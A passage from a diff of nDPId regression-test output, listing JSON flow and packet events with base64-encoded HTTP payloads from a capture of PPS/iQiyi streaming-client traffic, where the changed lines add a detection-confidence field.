-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353191606,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5GMJAAC4G\/04kbtwPwKhzCABQxk20SBDwor1D9lAYPLgN5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 01078{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1467353191608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"ts_msec":1467353191608,"pkt":"ABxCjnAxTF4M6gNlCABFAAIApFFAADgGH8jfGmoTwKhzCABQxlCbtI4lBJ7pcFAYAB996wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2Jsb2ddDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01183{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"ts_msec":1467353191688,"pkt":"TF4M6gNlABxCjnAxCABFAAJOL\/RAAIAGZxbAqHMIZePIC8ZRAFCkQ4vBOJoXClAY\/\/Dn4QAAR0VUIC9jY3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IENvb2tpZUNsZWFyX3J1bnh4DQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25Kc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1467353191722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"ts_msec":1467353191722,"pkt":"ABxCjnAxTF4M6gNlCABFAAEVyyVAAC8GHh5l48gLwKhzCABQxlE4mhcKpEON51AYPCgsNwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2pzb247IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsiciI6ZmFsc2V9"}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1467353192820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353192820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDkwAAAER9TTAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1467353193179,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353193179,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAo0AAAERAQHAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1467353195822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353195822,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDk8AAAER9THAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"ts_msec":1467353195852,"pkt":"TF4M6gNlABxCjnAxCABFAAOkMjBAAIAGuBrAqHMIymwO7MZTAFDqT5aSVlCsgFAYQTeESwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxOTUwNTQmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
-01263{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01289{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"ts_msec":1467353195855,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMjFAAIAGqNHAqHMIe31vRsZUAFDL+rP6wuI4bVAY\/\/CsBQAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"}
-00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1467353195956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353195956,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5xWxAADMGdMnKbA7swKhzCABQxlNWUKyA6k+aDlAYACCSWwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1467353195998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1467353195998,"pkt":"ABxCjnAxTF4M6gNlCABFAAEFPIVAAC8G7\/l7fW9GwKhzCABQxlTC4jhty\/q1U1AYPLjA5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"ts_msec":1467353196104,"pkt":"TF4M6gNlABxCjnAxCABFAAOJMkZAAIAGuC7AqHMIymwO3cZVAFB2diePbxSNNlAYAQSFkwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0yMDkmdG0zMT05NCZ0bTMyPTMxJnRtMzM9NzgmdG0zND0xJnRtND0xNzYmdG00MT00NyZ0bTQyPTE2JnRtNDM9NzgmdG00ND03JnRtNT0zMjgmdG01MT0wJnRtNTI9MCZ0bTUzPTAmdG01ND02MyZ0bTY9JnRtNjI9MCZ0bTYzPTAmdG03PTAmdG03MT0wJnRtNzI9MCZ0bTczPTAmdG04PTAmdG04MT0wJnRtODI9MCZ0bTgzPTAmdG05PTk2MiZ0bTkyPTE1JnRtOTM9Mjk3JmNoaXBpZD1JbnRlbCUyOFIlMjklMjBDb3JlJTI4VE0lMjklMjBpNSUyRDI1NTdNJTIwQ1BVJTIwJTQwJTIwMSUyRTcwR0h6JnJhPTEmaXNoY2RuPTImcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT0zMSZyPTQ3OTUzMTAwMCZhaWQ9MTgwOTMyMzAxJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPVdpbmRvd3MlMjA3JnY9NSUyRTIlMkUxNSUyRTIyNDAma3J2PTIlMkUwJTJFMTAyJmR0PSZodT0tMSZybj0xNDY3MzUzMTk1JmlzbG9jYWw9MCZhcz0wMzExYzVhMGQ1NTk2MDYzZGI1OTQ0YmQ3NmI2Y2JmZiZ2ZT1iMWY5MGY4ZGE2ZmUwMjU4ZDEzNjE2YTgwNzBjYjk5NyZwZT0mdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="}
-01412{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 